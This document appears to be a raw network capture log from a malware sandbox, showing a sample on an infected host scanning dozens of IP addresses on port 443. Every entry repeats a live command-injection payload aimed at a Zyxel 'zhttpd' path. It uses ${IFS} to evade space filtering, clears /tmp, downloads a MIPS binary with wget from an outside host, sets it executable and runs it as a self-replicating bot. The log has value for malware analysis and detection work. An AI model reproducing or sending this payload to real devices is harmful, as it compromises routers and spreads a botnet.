                                    Jan 13, 2024 19:02:10.768373966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    637192.168.2.135336679.108.204.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768413067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    638192.168.2.133903081.38.190.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768462896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    639192.168.2.135017891.113.180.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768521070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    640192.168.2.1352788163.126.188.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768552065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    641192.168.2.133919046.108.195.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768645048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    642192.168.2.134309050.116.125.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768667936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    643192.168.2.135094477.11.213.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768668890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    644192.168.2.134929270.45.81.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768722057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    645192.168.2.13570301.166.178.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768790007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    646192.168.2.1360146101.96.117.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:10.768841028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    647192.168.2.1333884123.137.92.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:11.773762941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    648192.168.2.134482636.236.52.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:11.773962021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    649192.168.2.1356652132.211.101.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:13.787687063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    650192.168.2.1333114168.254.51.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.796993971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    651192.168.2.134258693.240.0.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797024965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    652192.168.2.1346206191.208.79.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797058105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    653192.168.2.1334180132.231.134.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797086000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    654192.168.2.1333036176.245.223.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797117949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    655192.168.2.1333352128.175.35.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797161102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    656192.168.2.133853657.23.209.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797195911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    657192.168.2.133623883.171.149.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797234058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    658192.168.2.1334678155.27.13.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797247887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    659192.168.2.133775267.227.0.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797291040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    660192.168.2.1337360136.144.139.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797341108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    661192.168.2.1346842186.57.188.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797468901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    662192.168.2.134596894.101.128.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797508001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    663192.168.2.136020054.117.165.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:14.797533035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    664192.168.2.1358182164.13.34.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:15.806751013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    665192.168.2.133841642.84.164.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:15.806787014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    666192.168.2.133839898.11.220.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:15.806813002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    667192.168.2.1348114112.191.124.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:15.806839943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    668192.168.2.135889478.205.198.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:15.806869984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    669192.168.2.1342444109.66.226.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:15.806936026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    670192.168.2.1349788187.52.240.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817152977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    671192.168.2.1337728128.174.85.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817167044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    672192.168.2.1358102196.105.94.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817189932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    673192.168.2.1337740167.137.109.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817236900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    674192.168.2.135211490.157.23.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817239046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    675192.168.2.133647044.3.52.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817269087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    676192.168.2.13373528.211.5.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817303896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    677192.168.2.134106036.51.167.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817356110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    678192.168.2.1345716128.249.206.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817398071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    679192.168.2.133826261.244.68.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817435980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    680192.168.2.1358202196.73.207.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817457914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    681192.168.2.1357456171.226.17.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817476034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    682192.168.2.1358728120.93.161.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817504883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    683192.168.2.1347116174.67.220.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817533016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    684192.168.2.1350126150.103.213.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817574024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    685192.168.2.134780679.92.123.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817784071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    686192.168.2.1349968179.94.167.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817862988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    687192.168.2.1353264101.209.154.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:16.817926884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    688192.168.2.1343124107.121.38.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:17.827908993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    689192.168.2.1335092193.12.146.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:17.827965021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    690192.168.2.135332218.65.127.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:17.828048944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    691192.168.2.1357842196.88.190.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:18.837048054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    692192.168.2.135966469.41.173.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:18.837106943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    693192.168.2.1342862163.212.199.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:18.837135077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    694192.168.2.13577182.128.63.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:18.837162971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    695192.168.2.1341770216.45.232.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:18.837199926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    696192.168.2.134238893.21.152.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:18.837240934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    697192.168.2.135342840.44.223.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:18.837297916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    698192.168.2.1348384152.230.215.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:18.837400913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    699192.168.2.135908448.193.253.206443
                                    TimestampBytes transferredDirectionData
